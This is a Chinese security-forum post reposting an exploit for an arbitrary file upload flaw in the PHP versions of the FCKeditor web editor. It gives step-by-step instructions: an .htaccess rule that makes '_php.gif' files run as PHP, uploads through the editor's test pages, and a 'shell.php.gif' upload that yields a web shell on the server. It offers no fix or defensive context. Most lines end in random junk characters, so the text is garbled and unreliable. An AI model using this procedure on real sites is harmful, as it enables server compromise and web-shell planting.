找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2393|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞$ l/ G, X/ [" a3 ]
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07/ d% M$ g$ y* `! r" i$ A. V4 m
减小字体 增大字体& l2 f- v# v. F' j* x: D" K; O
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
: I5 p! {: M( v[+] Date: 2011
, o( N# d, b# }7 X) m3 W- |2 t[+] Author : sinesafe.cn0 X0 x, v; y  \, w
[+] Website : WwW.sinesafe.cn
) o' l( @& K8 w  K) F* g———————————————————6 X! z4 S6 T( G3 \  e4 b; l
1.create a htaccess file:1 m- L3 ?3 P, B1 d+ `0 y2 A
code:
4 `9 v# V: f& E* {7 `! t4 ^' r<FilesMatch “_php.gif”>5 {& ?* H* @. `8 Y8 \) D
SetHandler application/x-httpd-php7 x( ]6 _4 M+ a0 m+ ]
</FilesMatch>
0 \& e; {# A; Y0 k# j2 t- E, b: L1 p2 r4 t  p/ J5 N
2.Now upload this htaccess with FCKeditor.
+ {" J% I' M9 T% Z$ i8 z, k$ ^) P- u
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
5 y) H3 k6 n7 b0 r" D2 d. B4 ~
! r1 Z2 w5 z4 k% b! B( }1 p5 Mhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html7 `4 g" k! ~' m" B* {# v

: P8 x, Q. B- G0 h! l" c———————————————————————————————-
. b" O1 ?: i2 ~% n% N$ ]3.Now upload shell.php.gif with FCKeditor.
% Y; j" x# V9 ^8 P2 H3 i" A6 {4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.+ b7 I; q4 M1 t2 |
5.http://www.sinesafe.cn/anything/shell_php.gif
" f" H1 D! p9 p: X& j9 _9 T6.Now shell is available from server.
9 G8 f6 k9 Q, ]4 `( ~: l, Y
* b% ]2 C* D( K/ w. S" ?
+ ]+ s6 e; I- g: W. `& c  R
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表